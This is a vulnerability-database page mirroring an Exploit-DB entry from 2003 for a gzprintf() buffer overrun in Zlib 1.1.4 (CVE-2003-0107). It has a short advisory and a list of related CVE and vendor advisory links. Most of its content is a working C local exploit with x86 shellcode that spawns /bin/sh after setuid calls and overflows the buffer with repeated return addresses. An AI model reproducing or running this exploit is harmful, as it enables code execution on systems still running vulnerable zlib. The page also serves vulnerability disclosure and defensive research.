Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbCrZEDB-ID:22274
HistoryFeb 23, 2003 - 12:00 a.m.

Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2)

2003-02-2300:00:00
CrZ
www.exploit-db.com
33

AI Score

7.4

Confidence

Low

JSON
// source: https://www.securityfocus.com/bid/6913/info
 
A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.
 
Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.
 
Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected. 

C local exploit for zlib <= 1.1.4
/      just for fun..not for root :)
\
/   Usage: gcc -o zlib zlib.c -lz
\
/   by CrZ [[email protected]] lbyte
[lbyte.void.ru]
*/


#include <zlib.h>
#include <errno.h>
#include <stdio.h>


int main(int argc, char **argv) {
        char shell[]=
                "\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
                "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
                "\xc0\x88\x43\x07\x89\x5b\x08\x89"
                "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
                "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
                "/bin/sh";
        gzFile f;
        int ret;
        long xret;
        char cret[10];
        char badbuff[10000];
        int i;

        sprintf(badbuff,"%p",shell);
        sscanf(badbuff,"0x%x",&xret);

        printf("[>] exploiting...\n");

        if(!(f = gzopen("/dev/null", "w"))) {
                perror("/dev/null");
                exit(1);
        }

        printf("[>] xret = 0x%x\n",xret);


sprintf(cret,"%c%c%c%c",(xret&0xff)+4,(xret>>8)&0xff,

(xret>>16)&0xff,(xret>>24)&0xff);

        bzero(badbuff,sizeof(badbuff));

        for(i=0;i<5000;i+=4) strcat(badbuff,cret);

        setuid(0);
        setgid(0);
        ret = gzprintf(stderr, "%s", badbuff );
        setuid(0);
        setgid(0);
        printf(">Sent!..\n");
        printf("gzprintf -> %d\n", ret);
        ret = gzclose(f);
        printf("gzclose -> %d [%d]\n", ret, errno);

        exit(0);
}

Related

cvelist 1
f5 2
debiancve 1
nessus 2
nvd 1
redhat 1
cert 1
cve 1
exploitdb 1
jvn 1
cvelist
cvelist
CVE-2003-0107
2004-09-01 04:00:00
f5
f5
SOL2593 - Buffer overflow in zlib - CAN-2003-0107
2006-10-06 00:00:00
Buffer overflow in zlib - CAN-2003-0107
2006-10-07 04:00:00
debiancve
debiancve
CVE-2003-0107
2004-09-01 04:00:00
nessus
nessus
RHEL 2.1 : zlib (RHSA-2003:081)
2004-07-06 00:00:00
Mandrake Linux Security Advisory : zlib (MDKSA-2003:033)
2004-07-31 00:00:00
nvd
nvd
CVE-2003-0107
2003-03-07 05:00:00
redhat
redhat
(RHSA-2003:081) zlib security update
2003-05-22 00:00:00
cert
cert
zlib "gzprintf()" function vulnerable to buffer overflow
2003-05-23 00:00:00
cve
cve
CVE-2003-0107
2004-09-01 04:00:00
exploitdb
exploitdb
Zlib 1.1.4 - Compression Library &#039;gzprintf()&#039; Buffer Overrun (1)
2003-02-23 00:00:00
jvn
jvn
JVN#78689801: BGA32.DLL and QBga32.DLL contain multiple vulnerabilities
2015-05-19 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:22274
cvelist1f52debiancve1nessus2nvd1redhat1cert1cve1exploitdb1jvn1